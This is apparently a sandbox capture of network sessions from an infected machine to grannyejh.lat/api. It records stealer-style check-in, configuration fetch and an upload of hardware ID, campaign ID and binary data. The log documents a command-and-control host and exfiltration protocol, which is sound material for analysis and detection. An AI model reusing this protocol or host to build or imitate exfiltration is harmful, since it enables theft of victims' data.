                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ihR6zO3Y%2F3EV0D2iHm1rlzwaxz%2FcKlpFs0vfATbTnW%2FNHeaujx3htE7IjgFOwz8dihSwQNA8JytD2pcbs5tIqYnDrn6x5gSsCKomrtBw8yYdh7aCKGj5Z8O3pnqi2C%2FX%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b2b8cd3441c0-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1687&rtt_var=647&sent=304&recv=600&lost=0&retrans=0&sent_bytes=2833&recv_bytes=578285&delivery_rate=1673352&cwnd=210&unsent_bytes=0&cid=dcde9518116a701c&ts=2424&x=0"


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          34192.168.2.450206172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:26:48 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:26:48 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                                          2024-12-19 13:26:49 UTC1114INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:49 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=f3om0vra553gcd9483u2jhj7hm; expires=Mon, 14 Apr 2025 07:13:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lxixxl1EHaskQWM44ELxC1XPwMHWLUs3znngTLqzgEp5Jy2LKci9UsRgqIolfwHFvvtLa1sfZJ4fS4ctltbX7iz55NuRs6Uwpq9ErOFGqYGivvN4r8jq%2BT4E5HceeRAW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b9fb18434399-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1907&min_rtt=1746&rtt_var=770&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=904&delivery_rate=1672394&cwnd=222&unsent_bytes=0&cid=2b35315eb08fc6d5&ts=1039&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:26:49 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                                                          2024-12-19 13:26:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          35192.168.2.450209172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:26:50 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 47
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:26:50 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                          2024-12-19 13:26:51 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:51 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=mod26iqmg4d6jmb4g3m22u2p57; expires=Mon, 14 Apr 2025 07:13:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nTim7DcSDWAZ43BQUivbFeNAvx%2FLEMB2mAdrWqcQioXj3R3NRulNd%2Fc%2FmcPfL2%2B61s9UAXgX%2FtP4QcgHj8JhutoJRIMTFysZbMy3LB29doxPQxJvNAM5Q96VG7ynwVox"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47ba093e5af5f8-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1622&rtt_var=617&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=944&delivery_rate=1761158&cwnd=57&unsent_bytes=0&cid=c02d8039697f9721&ts=780&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:26:51 UTC249INData Raw: 34 36 39 0d 0a 57 46 54 62 6b 32 49 49 73 75 77 57 66 6f 56 79 2b 57 51 52 43 54 41 74 33 6e 7a 4c 50 6b 71 68 75 48 57 55 78 5a 76 30 38 31 41 6a 64 71 32 78 57 44 79 65 7a 6d 55 62 70 30 69 4e 46 6d 52 73 48 41 2b 2f 47 4f 6b 45 4c 4d 44 55 42 76 48 70 75 59 4b 65 63 6d 49 79 75 76 38 52 62 5a 37 4f 63 77 61 6e 53 4b 49 66 4d 32 78 65 44 2b 52 65 72 6c 51 6f 77 4e 51 58 39 61 37 30 68 4a 38 7a 4d 44 69 38 2b 77 64 72 31 6f 31 36 45 2b 41 58 6e 41 56 37 5a 31 6c 41 74 68 48 70 45 6d 6a 45 77 6c 65 75 35 39 61 52 68 7a 45 56 4e 61 6a 34 51 48 57 65 6c 7a 51 62 36 31 44 44 52 6e 42 73 55 6b 47 34 47 4b 42 57 49 73 6e 63 46 76 43 76 36 35 32 56 4f 44 41 32 76 2f 6f 4e 59 73 4b 41 63 42 54 72 45 5a 59 46 4d 79 55 53 53 4b 52 65 38 52 78 37
                                                                                                                                                                                                                                                          Data Ascii: 469WFTbk2IIsuwWfoVy+WQRCTAt3nzLPkqhuHWUxZv081Ajdq2xWDyezmUbp0iNFmRsHA+/GOkELMDUBvHpuYKecmIyuv8RbZ7OcwanSKIfM2xeD+RerlQowNQX9a70hJ8zMDi8+wdr1o16E+AXnAV7Z1lAthHpEmjEwleu59aRhzEVNaj4QHWelzQb61DDRnBsUkG4GKBWIsncFvCv652VODA2v/oNYsKAcBTrEZYFMyUSSKRe8Rx7
                                                                                                                                                                                                                                                          2024-12-19 13:26:51 UTC887INData Raw: 38 64 6b 47 35 37 4c 30 68 70 64 79 4a 58 69 67 73 51 64 6d 6b 4e 59 30 46 4f 73 65 6e 67 56 38 62 46 4e 50 72 68 47 70 58 79 44 4c 33 68 33 35 71 50 61 59 6d 7a 55 79 50 37 37 2b 42 32 4c 57 67 58 64 63 71 56 43 63 48 6a 4d 7a 45 6d 2b 73 48 61 70 49 4a 64 4b 61 43 4c 69 2b 75 5a 47 64 63 6d 4a 32 76 2f 38 42 5a 39 43 63 66 42 66 73 46 59 6b 4e 65 6d 5a 66 54 37 45 55 70 6c 38 6f 78 4e 41 64 2b 61 33 39 6d 35 77 30 4f 6a 62 35 76 30 42 74 79 4d 34 73 58 4d 51 56 69 77 46 2f 66 52 42 31 2f 41 48 6e 52 57 6a 45 31 6c 65 75 35 2f 47 54 6b 6a 45 78 4f 62 72 35 43 33 6a 51 6e 48 49 52 34 67 4b 64 41 33 31 68 55 56 32 32 45 4b 39 66 49 63 6a 54 45 76 47 6a 75 64 6a 52 4e 53 4a 32 34 62 45 68 5a 39 75 43 66 67 76 6e 55 49 52 49 61 69 74 56 51 2f 78 47 36 56 67
                                                                                                                                                                                                                                                          Data Ascii: 8dkG57L0hpdyJXigsQdmkNY0FOsengV8bFNPrhGpXyDL3h35qPaYmzUyP77+B2LWgXdcqVCcHjMzEm+sHapIJdKaCLi+uZGdcmJ2v/8BZ9CcfBfsFYkNemZfT7EUpl8oxNAd+a39m5w0Ojb5v0BtyM4sXMQViwF/fRB1/AHnRWjE1leu5/GTkjExObr5C3jQnHIR4gKdA31hUV22EK9fIcjTEvGjudjRNSJ24bEhZ9uCfgvnUIRIaitVQ/xG6Vg
                                                                                                                                                                                                                                                          2024-12-19 13:26:51 UTC1369INData Raw: 34 34 62 33 0d 0a 6d 68 63 51 62 73 49 36 55 4e 6d 32 70 6f 51 2b 75 65 68 31 70 34 39 4e 54 36 35 38 41 52 6e 31 49 39 35 45 4f 34 54 6c 77 70 37 5a 6c 35 4c 73 78 61 68 58 79 44 52 31 42 6e 77 6f 66 6d 54 30 58 78 36 4d 61 47 78 57 43 72 30 67 47 4d 49 37 46 4b 75 42 58 31 6c 56 56 6e 38 41 65 64 46 61 4d 54 57 56 36 37 6e 39 35 75 61 50 6a 30 2f 75 50 49 41 59 4e 36 42 66 68 54 76 45 4a 59 48 65 47 4e 55 51 72 63 52 70 6c 73 67 77 4e 59 53 2b 36 53 35 32 4e 45 31 49 6e 62 68 73 53 56 6b 30 35 39 6c 58 74 49 54 6c 51 68 30 66 52 4a 51 38 67 66 70 57 79 53 44 67 6c 66 38 6f 50 36 53 6e 44 67 35 4d 72 33 38 44 32 50 5a 68 32 59 57 36 78 36 4a 43 33 6c 75 58 45 4f 35 45 61 6c 64 4b 63 33 51 48 4c 62 70 75 5a 47 4a 63 6d 4a 32 6c 76 77 51 65 4e 71 46 5a 56
                                                                                                                                                                                                                                                          Data Ascii: 44b3mhcQbsI6UNm2poQ+ueh1p49NT658ARn1I95EO4Tlwp7Zl5LsxahXyDR1BnwofmT0Xx6MaGxWCr0gGMI7FKuBX1lVVn8AedFaMTWV67n95uaPj0/uPIAYN6BfhTvEJYHeGNUQrcRplsgwNYS+6S52NE1InbhsSVk059lXtITlQh0fRJQ8gfpWySDglf8oP6SnDg5Mr38D2PZh2YW6x6JC3luXEO5EaldKc3QHLbpuZGJcmJ2lvwQeNqFZV
                                                                                                                                                                                                                                                          2024-12-19 13:26:51 UTC1369INData Raw: 48 6a 4d 7a 45 6d 43 2f 43 4b 4d 63 4e 34 33 44 56 2f 47 72 75 63 37 52 4f 44 59 79 75 76 30 4a 5a 74 32 50 63 42 76 71 46 4a 73 41 64 57 35 54 52 4c 51 53 70 6c 59 6b 78 39 59 65 38 4b 76 36 6c 5a 64 79 64 48 61 2b 36 55 41 79 6b 4b 39 35 46 2b 73 51 6d 42 64 30 4b 78 77 50 73 68 69 70 48 48 44 56 79 67 44 78 75 4c 65 50 30 54 55 32 64 75 47 78 43 6e 6a 56 67 48 41 57 34 68 53 58 44 48 4e 75 51 45 65 36 47 61 56 55 4c 63 7a 63 45 76 75 67 38 70 57 44 49 44 6b 79 74 2f 31 41 4a 4a 43 4a 62 46 79 2f 55 4c 34 52 63 48 74 55 54 50 77 42 35 30 56 6f 78 4e 5a 58 72 75 66 35 6d 4a 30 35 50 54 32 79 39 51 52 71 33 59 56 36 45 75 34 63 6b 77 70 30 65 56 39 4b 74 42 53 67 57 53 54 4f 32 51 58 31 70 72 6e 59 30 54 55 69 64 75 47 78 4a 31 6e 6e 72 54 51 44 71 51 6e
                                                                                                                                                                                                                                                          Data Ascii: HjMzEmC/CKMcN43DV/Gruc7RODYyuv0JZt2PcBvqFJsAdW5TRLQSplYkx9Ye8Kv6lZdydHa+6UAykK95F+sQmBd0KxwPshipHHDVygDxuLeP0TU2duGxCnjVgHAW4hSXDHNuQEe6GaVULczcEvug8pWDIDkyt/1AJJCJbFy/UL4RcHtUTPwB50VoxNZXruf5mJ05PT2y9QRq3YV6Eu4ckwp0eV9KtBSgWSTO2QX1prnY0TUiduGxJ1nnrTQDqQn
                                                                                                                                                                                                                                                          2024-12-19 13:26:51 UTC1369INData Raw: 77 6f 50 6b 42 32 6d 56 32 6a 63 6c 41 36 32 6f 50 58 57 79 58 49 39 50 72 48 2f 41 32 7a 62 67 6e 67 64 37 68 61 65 44 6e 52 6b 56 55 61 37 48 71 39 4f 4c 38 37 54 46 2f 32 75 38 35 4b 51 4f 58 70 34 2b 66 59 59 4b 6f 6a 4f 52 68 76 78 41 4a 68 47 62 43 56 4c 44 37 73 53 36 51 52 6f 7a 73 67 57 38 37 58 39 6d 5a 6f 67 4d 54 43 35 39 42 4a 74 33 49 52 37 48 2b 38 64 6d 41 35 68 61 31 39 50 72 67 79 76 56 79 61 44 6c 46 66 78 76 37 6e 4f 30 51 4d 74 50 66 6e 75 54 6e 4f 51 69 58 68 63 76 31 43 59 44 48 35 6c 51 45 75 36 46 61 70 53 49 4d 62 53 45 2f 79 71 39 70 32 62 4f 7a 49 32 74 76 51 49 59 64 61 41 64 52 72 72 48 64 74 49 4d 32 78 4b 44 2b 52 65 6a 6b 59 6c 78 63 30 47 77 36 44 35 78 39 45 74 64 43 2f 35 39 67 77 71 69 4d 35 35 45 4f 30 64 6e 67 4a 37
                                                                                                                                                                                                                                                          Data Ascii: woPkB2mV2jclA62oPXWyXI9PrH/A2zbgngd7haeDnRkVUa7Hq9OL87TF/2u85KQOXp4+fYYKojORhvxAJhGbCVLD7sS6QRozsgW87X9mZogMTC59BJt3IR7H+8dmA5ha19PrgyvVyaDlFfxv7nO0QMtPfnuTnOQiXhcv1CYDH5lQEu6FapSIMbSE/yq9p2bOzI2tvQIYdaAdRrrHdtIM2xKD+RejkYlxc0Gw6D5x9EtdC/59gwqiM55EO0dngJ7
                                                                                                                                                                                                                                                          2024-12-19 13:26:51 UTC1369INData Raw: 49 48 36 56 73 6b 67 34 4a 58 2b 4b 72 2f 6c 35 41 36 4d 6a 61 2f 2b 77 52 70 32 59 31 7a 46 65 45 62 6d 41 78 38 62 46 52 4c 76 42 57 75 55 69 37 47 30 52 36 32 36 62 6d 52 69 58 4a 69 64 70 2f 53 45 6e 6a 69 67 48 63 48 70 77 2f 56 48 7a 4e 73 58 67 2f 6b 58 71 4a 55 4a 39 48 66 48 76 36 6a 38 4a 61 56 4f 44 63 78 75 66 51 4e 62 39 53 41 63 42 76 6e 48 4a 51 42 65 32 52 57 54 37 4e 65 35 78 77 76 32 35 70 50 74 6f 66 79 67 4c 41 38 4d 53 54 35 37 6b 35 7a 6b 49 6c 34 58 4c 39 51 6c 51 39 79 59 31 78 44 74 42 71 37 58 43 50 4b 31 52 62 35 70 2f 71 58 6d 7a 6f 6f 4d 4c 6e 36 43 47 33 59 69 6e 6f 4f 35 68 2f 62 53 44 4e 73 53 67 2f 6b 58 70 68 4b 4c 38 54 56 56 64 2b 67 34 70 65 62 4d 54 45 36 2b 65 35 4f 63 35 43 4a 65 46 79 2f 55 4a 59 4b 66 6d 39 41 51
                                                                                                                                                                                                                                                          Data Ascii: IH6Vskg4JX+Kr/l5A6Mja/+wRp2Y1zFeEbmAx8bFRLvBWuUi7G0R626bmRiXJidp/SEnjigHcHpw/VHzNsXg/kXqJUJ9HfHv6j8JaVODcxufQNb9SAcBvnHJQBe2RWT7Ne5xwv25pPtofygLA8MST57k5zkIl4XL9QlQ9yY1xDtBq7XCPK1Rb5p/qXmzooMLn6CG3YinoO5h/bSDNsSg/kXphKL8TVVd+g4pebMTE6+e5Oc5CJeFy/UJYKfm9AQ
                                                                                                                                                                                                                                                          2024-12-19 13:26:51 UTC1369INData Raw: 63 63 49 50 52 47 66 4f 6d 39 5a 79 57 50 43 67 33 73 2f 30 42 62 64 65 46 5a 68 66 31 47 35 4d 46 66 57 4e 62 54 37 49 65 71 46 45 6f 67 35 52 58 38 62 2b 35 7a 74 45 58 47 53 47 76 2b 30 4a 4a 78 35 68 2b 47 2b 73 47 6b 41 64 77 66 56 39 66 2f 46 44 70 54 53 2f 53 6d 6b 2f 67 74 2b 36 52 6a 6e 77 6a 64 72 37 39 51 44 4b 51 68 58 73 53 36 68 75 66 44 33 5a 6a 55 55 71 35 46 4b 56 51 4b 63 76 54 48 66 4f 69 2f 35 79 53 50 44 55 33 74 66 55 4a 5a 4e 6e 4f 4f 6c 7a 67 43 4e 74 65 4d 31 31 43 53 4b 51 54 75 52 34 61 77 4d 73 47 34 36 72 70 6b 4e 4d 64 4f 54 71 36 39 41 64 36 6b 4a 45 36 42 61 63 58 6c 30 59 72 4b 31 4a 4c 73 42 32 75 55 69 66 4f 31 52 44 39 71 50 4f 59 67 7a 30 2f 50 72 58 35 44 58 6a 61 68 47 59 56 37 68 32 56 44 6d 46 6f 45 67 48 38 47 62
                                                                                                                                                                                                                                                          Data Ascii: ccIPRGfOm9ZyWPCg3s/0BbdeFZhf1G5MFfWNbT7IeqFEog5RX8b+5ztEXGSGv+0JJx5h+G+sGkAdwfV9f/FDpTS/Smk/gt+6Rjnwjdr79QDKQhXsS6hufD3ZjUUq5FKVQKcvTHfOi/5ySPDU3tfUJZNnOOlzgCNteM11CSKQTuR4awMsG46rpkNMdOTq69Ad6kJE6BacXl0YrK1JLsB2uUifO1RD9qPOYgz0/PrX5DXjahGYV7h2VDmFoEgH8Gb
                                                                                                                                                                                                                                                          2024-12-19 13:26:51 UTC1369INData Raw: 32 52 6d 30 6c 75 2b 62 67 54 45 2f 4d 59 66 50 44 6d 33 45 69 58 6f 61 35 31 44 56 52 6e 77 72 43 6e 62 38 56 75 6c 6a 5a 6f 50 43 56 36 37 6e 7a 4a 57 66 50 44 30 67 71 4c 77 6a 66 63 61 45 62 31 37 42 46 34 6f 50 5a 57 5a 41 44 2f 4a 65 72 78 78 77 6b 35 52 58 38 72 61 35 7a 73 46 67 59 57 50 71 70 6c 41 34 7a 38 42 74 58 50 46 51 77 31 51 39 4b 30 41 50 35 46 37 75 58 7a 72 52 33 42 54 67 70 4c 36 6f 72 78 49 78 49 4c 6a 38 43 32 62 75 73 47 45 66 36 52 36 63 45 47 49 72 48 41 2b 7a 58 76 46 6c 61 49 75 61 4b 4c 6a 6e 34 64 62 4a 63 67 38 31 74 2f 38 48 66 4d 48 44 56 42 66 78 45 5a 59 4e 66 79 6c 54 51 71 77 5a 36 52 4a 6f 78 5a 70 50 70 75 6d 35 6b 6f 42 79 59 6d 62 72 71 6c 55 35 68 39 34 6d 41 36 6b 4a 32 78 41 7a 4d 77 41 42 2f 41 7a 70 42 47 69
                                                                                                                                                                                                                                                          Data Ascii: 2Rm0lu+bgTE/MYfPDm3EiXoa51DVRnwrCnb8VuljZoPCV67nzJWfPD0gqLwjfcaEb17BF4oPZWZAD/Jerxxwk5RX8ra5zsFgYWPqplA4z8BtXPFQw1Q9K0AP5F7uXzrR3BTgpL6orxIxILj8C2busGEf6R6cEGIrHA+zXvFlaIuaKLjn4dbJcg81t/8HfMHDVBfxEZYNfylTQqwZ6RJoxZpPpum5koByYmbrqlU5h94mA6kJ2xAzMwAB/AzpBGi
                                                                                                                                                                                                                                                          2024-12-19 13:26:51 UTC1369INData Raw: 35 4c 36 68 35 49 79 4d 58 62 33 73 51 59 71 69 4e 77 36 58 4f 4d 42 32 31 34 6a 4f 51 6b 61 37 30 6e 35 44 6a 65 4e 77 31 66 67 35 36 48 45 33 33 49 6f 64 75 47 78 52 32 6e 43 6e 48 49 66 38 52 50 63 4f 45 31 4e 55 55 69 36 48 61 64 4c 4f 59 48 31 46 50 32 72 39 5a 47 48 44 41 51 6a 75 76 38 4f 62 63 61 66 4e 46 4b 6e 48 39 74 65 53 69 74 44 52 62 74 53 34 52 41 35 30 4e 51 63 34 4b 43 35 71 64 39 79 49 6e 62 68 73 54 56 70 33 6f 42 7a 43 76 5a 64 76 51 56 30 62 56 46 42 71 77 2f 70 45 6d 6a 46 6d 6b 2b 6b 36 62 6d 53 67 48 4a 69 5a 75 75 71 56 54 6d 48 33 69 59 44 71 51 6e 62 45 44 4d 7a 41 51 48 38 44 4f 6b 45 61 49 54 55 47 76 65 6b 39 35 57 44 49 44 77 31 72 2f 4a 48 56 4f 36 72 65 52 48 69 48 70 77 34 54 55 70 59 58 37 45 52 72 6d 49 57 39 4d 73 51
                                                                                                                                                                                                                                                          Data Ascii: 5L6h5IyMXb3sQYqiNw6XOMB214jOQka70n5DjeNw1fg56HE33IoduGxR2nCnHIf8RPcOE1NUUi6HadLOYH1FP2r9ZGHDAQjuv8ObcafNFKnH9teSitDRbtS4RA50NQc4KC5qd9yInbhsTVp3oBzCvZdvQV0bVFBqw/pEmjFmk+k6bmSgHJiZuuqVTmH3iYDqQnbEDMzAQH8DOkEaITUGvek95WDIDw1r/JHVO6reRHiHpw4TUpYX7ERrmIW9MsQ


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          36192.168.2.450210172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:26:53 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=BLDYLVCWZEF8Y3K
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 18145
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:26:53 UTC15331OUTData Raw: 2d 2d 42 4c 44 59 4c 56 43 57 5a 45 46 38 59 33 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 4c 44 59 4c 56 43 57 5a 45 46 38 59 33 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 4c 44 59 4c 56 43 57 5a 45 46 38 59 33 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 42 4c 44 59 4c
                                                                                                                                                                                                                                                          Data Ascii: --BLDYLVCWZEF8Y3KContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--BLDYLVCWZEF8Y3KContent-Disposition: form-data; name="pid"2--BLDYLVCWZEF8Y3KContent-Disposition: form-data; name="lid"PsFKDg--pablo--BLDYL
                                                                                                                                                                                                                                                          2024-12-19 13:26:53 UTC2814OUTData Raw: e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11
                                                                                                                                                                                                                                                          Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wE
                                                                                                                                                                                                                                                          2024-12-19 13:26:54 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:54 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=s36rbcfa8ar50p1puos8kj9jc8; expires=Mon, 14 Apr 2025 07:13:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=78NqN65CbMUJ%2FWPzWqO23GFGDBqzCQpOfAZNTMvcMT%2BUcoBi03dSZJ2dy2dTmnM%2F3bnmqyaSh2vbGgOhjZdsIrnJFIvqofs5qdioUuZwHZI0HI5db35PhU1Sub4EOdd1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47ba17ebe0c470-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1737&min_rtt=1645&rtt_var=683&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2830&recv_bytes=19101&delivery_rate=1775075&cwnd=232&unsent_bytes=0&cid=bcd478cff59437f2&ts=1255&x=0"
